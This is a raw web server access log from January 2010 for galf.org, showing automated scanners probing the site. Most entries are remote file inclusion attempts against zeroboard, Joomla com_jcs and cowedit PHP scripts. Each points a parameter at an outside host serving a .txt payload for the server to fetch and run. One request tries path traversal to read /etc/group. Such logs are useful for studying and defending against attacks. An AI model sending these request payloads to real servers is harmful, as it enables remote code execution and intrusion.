74.223.143.131 - - [10/Jan/2010:22:13:55 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:13:55 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:13:55 -0800] "GET /logs/access_100104.log//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:14:56 -0800] "GET /logs/access_100104.log//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:14:59 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:15:07 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:17:44 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:17:44 -0800] "GET /logs/access_090928.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:17:45 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:17:57 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:17:58 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:18:02 -0800] "GET /logs/access_090928.log//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:18:14 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:18:16 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:18:16 -0800] "GET /logs/access_090928.log//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:18:19 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:18:20 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:18:23 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.110 - - [10/Jan/2010:22:18:31 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:18:43 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:18:44 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:18:47 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:18:47 -0800] "GET /logs/access_090928.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:18:47 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:18:49 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:19:05 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:19:06 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:19:10 -0800] "GET /logs/access_090928.log%20%20/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:19:22 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:19:23 -0800] "GET /logs/access_090928.log%20%20/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:19:24 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:19:27 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:19:27 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:19:27 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:19:27 -0800] "GET /logs/access_090928.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:19:30 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:19:30 -0800] "GET /logs/access_090928.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [10/Jan/2010:22:19:46 -0800] "GET /logs/access_090831.log/index2.php?content=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
211.62.35.55 - - [10/Jan/2010:22:19:46 -0800] "GET /index2.php?content=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
211.62.35.55 - - [10/Jan/2010:22:19:46 -0800] "GET /logs/index2.php?content=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:19:49 -0800] "GET /logs/access_090720.log//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [10/Jan/2010:22:20:00 -0800] "GET /logs/index2.php?content=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
211.62.35.55 - - [10/Jan/2010:22:20:00 -0800] "GET /index2.php?content=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
211.62.35.55 - - [10/Jan/2010:22:20:00 -0800] "GET /logs/access_090831.log/index2.php?content=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
211.62.35.55 - - [10/Jan/2010:22:20:58 -0800] "GET /logs/access_091214.log/index2.php?content=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
211.62.35.55 - - [10/Jan/2010:22:21:07 -0800] "GET /logs/access_091214.log/index2.php?content=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.6.163.20 - - [10/Jan/2010:22:21:41 -0800] "GET /logs/access.log HTTP/1.1" 200 132748 "-" "Mozilla/8.0" "www.galf.org"
211.62.35.55 - - [10/Jan/2010:22:22:54 -0800] "GET /logs/access_090831.log%20/index2.php?content=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:23:02 -0800] "GET /logs//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.24.35.80 - - [10/Jan/2010:22:23:02 -0800] "GET /logs/access.log//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.24.35.80 - - [10/Jan/2010:22:23:02 -0800] "GET /forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [10/Jan/2010:22:23:07 -0800] "GET /logs/access_090831.log%20/index2.php?content=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:23:09 -0800] "GET /logs/access_090810.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.109.233.150 - - [10/Jan/2010:22:23:34 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://lala123.110mb.com/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
68.109.233.150 - - [10/Jan/2010:22:23:38 -0800] "GET /logs/access_100104.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://lala123.110mb.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:23:58 -0800] "GET /forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.24.35.80 - - [10/Jan/2010:22:23:58 -0800] "GET /logs//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.24.35.80 - - [10/Jan/2010:22:23:58 -0800] "GET /logs/access.log//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.6.163.21 - - [10/Jan/2010:22:25:02 -0800] "GET /logs/access.log HTTP/1.1" 200 134853 "-" "Mozilla/8.0" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:22:25:35 -0800] "GET /?sourcedir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
71.250.232.26 - - [10/Jan/2010:22:25:39 -0800] "GET /logs/access.log/?sourcedir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.250.232.26 - - [10/Jan/2010:22:25:39 -0800] "GET /logs/?sourcedir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [10/Jan/2010:22:26:03 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:26:03 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:26:03 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:26:58 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:26:58 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:26:58 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:27:11 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [10/Jan/2010:22:27:11 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [10/Jan/2010:22:27:11 -0800] "GET /logs/access.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [10/Jan/2010:22:27:36 -0800] "GET /logs/access_090622.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:27:46 -0800] "GET /logs/access_090921.log%20%20//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:27:46 -0800] "GET /logs/access_090907.log%20%20//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:28:14 -0800] "GET /logs/access_090622.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:28:18 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:28:18 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:28:18 -0800] "GET /logs/access_100104.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:22:28:40 -0800] "GET /logs/access_090921.log/?sourcedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:22:28:41 -0800] "GET /logs/?sourcedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:22:28:41 -0800] "GET /?sourcedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:28:44 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [10/Jan/2010:22:28:44 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [10/Jan/2010:22:28:47 -0800] "GET /logs/access.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.19.215.158 - - [10/Jan/2010:22:29:10 -0800] "GET /logs/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
189.19.215.158 - - [10/Jan/2010:22:29:11 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.19.215.158 - - [10/Jan/2010:22:29:11 -0800] "GET /?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
189.19.215.158 - - [10/Jan/2010:22:29:27 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:29:42 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:29:42 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:29:45 -0800] "GET /logs/access_100104.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:22:31:13 -0800] "GET /logs/access_090720.log/?sourcedir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:22:31:21 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [10/Jan/2010:22:31:21 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [10/Jan/2010:22:31:21 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [10/Jan/2010:22:31:27 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [10/Jan/2010:22:31:27 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [10/Jan/2010:22:31:27 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [10/Jan/2010:22:31:49 -0800] "GET /logs/access_100104.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:22:31:49 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:22:31:49 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:22:31:50 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:22:31:50 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:22:31:50 -0800] "GET /logs/access_100104.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.228.240.75 - - [10/Jan/2010:22:33:59 -0800] "GET /admin/index.php?_SERVER[ConfigFile]=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
207.228.240.75 - - [10/Jan/2010:22:33:59 -0800] "GET /admin/index.php?_SERVER[ConfigFile]=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:22:36:19 -0800] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [10/Jan/2010:22:36:23 -0800] "GET /logs/access_100104.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:22:37:27 -0800] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [10/Jan/2010:22:37:31 -0800] "GET /logs/access_100104.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:22:38:12 -0800] "GET /logs/access_090608.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:38:19 -0800] "GET /logs/access_090921.log///?sourcedir=http://cep.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:38:19 -0800] "GET //?sourcedir=http://cep.fileave.com/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:38:19 -0800] "GET /logs///?sourcedir=http://cep.fileave.com/id1.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:22:38:52 -0800] "GET /logs/access_090713.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:22:38:55 -0800] "GET /logs/access_090608.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:22:39:25 -0800] "GET /logs/access_090713.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.110 - - [10/Jan/2010:22:39:43 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:40:13 -0800] "GET /logs//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:40:13 -0800] "GET /logs/access.log%20%20//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:40:13 -0800] "GET /cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:40:17 -0800] "GET /cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:40:17 -0800] "GET /logs//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:40:18 -0800] "GET /logs/access.log//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:40:24 -0800] "GET /logs//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:40:24 -0800] "GET /cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
